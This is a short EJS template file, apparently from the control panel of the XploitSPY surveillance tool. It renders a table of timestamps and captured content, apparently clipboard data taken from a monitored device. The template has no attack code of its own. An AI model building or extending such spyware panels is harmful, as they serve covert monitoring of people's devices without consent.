XploitSPY/server/assets/views/deviceManagerPages/clipboard_log.ejs

20 lines
605 B
Plaintext
Raw Normal View History

2020-01-11 23:35:37 +08:00
<div class="ui segment">
<table class="ui celled table">
<thead>
<tr>
<th>Time</th>
<th>Content</th>
</tr>
</thead>
<tbody>
<% pageData.forEach((notification) => {
let date = new Date(notification.time);
%>
<tr>
<td class="collapsing"><%= date.toLocaleString('en-GB', { timeZone: 'UTC' }) %></td>
<td><%= notification.content %></td>
</tr>
<% }) %>
</tbody>
</table>
</div>